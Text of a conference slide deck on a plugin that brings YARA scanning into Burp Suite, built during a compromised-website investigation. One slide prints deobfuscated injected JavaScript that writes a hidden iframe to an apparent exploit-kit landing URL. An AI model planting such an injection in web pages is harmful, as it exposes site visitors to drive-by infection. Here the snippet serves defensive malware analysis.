The document discusses the integration of YARA with Burp Suite, highlighting Ian Duffy's background and the use of these tools for cybersecurity. A case study illustrates how a compromised website was investigated using Burp Suite to identify malicious content through scanning. Future enhancements for the plugin are proposed, including live YARA scanning and persistence for configurations.

1. Burpsuite / Yara Integration
Ian Duffy
Polito,Inc.
@politoinc

2. Introduction
• Who am I?
• About Burpsuite and Yara
• Case study: A compromised website
• Plugin development
• Future Roadmap
• Questions

3. Who am I?
• Former USAF network defender
• Current cybersecurity consultant for Polito
• Background in penetration testing (traditional
and web application) as well as Malware
analysis
• Current duties involve malware analysis and
threat hunting

4. Burpsuite
• Burpsuite is a MITM proxy tool for viewing,
intercepting, modifying, and transmitting
HTTP(S) requests and responses.
• Allows the user to view all web content down
to the byte level, to include static pages,
JavaScript, JSON, WebSockets, and much
more.
• Includes several tools for assessing the
security of web applications

5. BurpSuite

6. Yara
• Yara is a sophisticated pattern matching tool
• Specifies a language for describing strings,
binary / hexadecimal data, file offset
information, file structure information in order
to write pattern matching rules
• Rules can be run against one or many files or
data streams in order to find matches

7. Yara Rules Example

8. Case Study
• Client contacts Polito and says that their IT
department is getting phone calls stating that
their website is causing “FireEye Alerts” and is
likely compromised
• Polito is asked to investigate and determine:
– Whether the site is actually compromised
– If so, scope, scale, and impact of the compromise

9. Case Study
• We request a tarball of the current webroot
folder and a dump of any backend CMS
databases
• In the meantime we begin spidering the
website using Burpsuite…

10. Case Study
Highly obfuscated JavaScript – interesting…

11. Case Study
• The obfuscated JavaScript is consistent with
the Angler Exploit Kit, which matches the
alerts reported by our client’s IT department
• After deobfuscation of the JavaScript we see
the following:
document.write('<style>.ddidfodevxgsz{position:absolute;to
p:-907px;width:300px;height:300px;}</style><div
class="ddidfodevxgsz"><iframe
src="http://ryonfmza.buildera.cf/consent/knife-lodge-
19720974" width="250" height="250"></iframe></div>');

12. Case Study

13. Case Study
• Problems:
– How do we identify whether this EK landing page /
malicious JavaScript has been inserted into any
other pages on the site?
– How do we identify whether the attackers have
left themselves a back door?

14. Case Study
• Possible Solutions
– Wait for three days before client can get tarball of
their website uploaded to our SFTP server
– Manually search through online web content
– Write something to automate our searching

15. Writing Burpsuite Plugins
• Burpsuite supports plugins in Java, Ruby, and
Python
– Ruby requires JRuby
– Python requires Jython
• We decided to use Python to develop our Yara
integration for expedience

16. The Plugin…
• Burpsuite specifies several interfaces for
performing various tasks
• Depending on what functionality we are trying to
implement, we must implement one or more of
those interfaces
• The interfaces specify methods that must be
implemented in order to handle events from the
Burpsuite UI

17. The Plugin…
• Each of the interfaces requires specific
methods be implemented
– IBurpExtender requires a method named
registerExtenderCallbacks
– Itab requires methods named getTabCaption and
getUIComponent
• Documentation for the interfaces is available
at:
– https://portswigger.net/burp/extender/api/index.html

18. The Plugin…
• Our basic use case was as follows:
– Burpsuite user spiders a website to retrieve as
much of the content as possible
– User right-clicks on website in Burp UI and selects
“Scan with Yara”
– Yara is used to scan the content of the web
requests and responses
– Results displayed to user in a Tab

19. Jython
• Jython is a hybrid between Java and Python
• You can “import” Java classes, instantiate Java
objects, and call their methods via Python
code:

20. Jython
• Java objects are instantiated by calling a
contructor method with the same name as
the class
– No “new” keyword like in Java
– Parameters to the constructors are the same
• Once instantiated, class objects can be used
just as with Java

21. Demonstration
Live demo time – this always works!

22. Future Roadmap
• Things that we are looking into:
– Live Yara scanning as you surf
– Persistent configuration settings
– Multiple rules files
• Your thoughts and feature requests are most
welcome!

23. Grab a Copy
• Plugin is available on our Github site:
• https://github.com/PolitoInc/Yara-Scanner
• Please send any feedback to
ian@politoinc.com

24. Questions?
Ian Duffy
Polito,Inc.
@politoinc
www.politoinc.com
Thank You!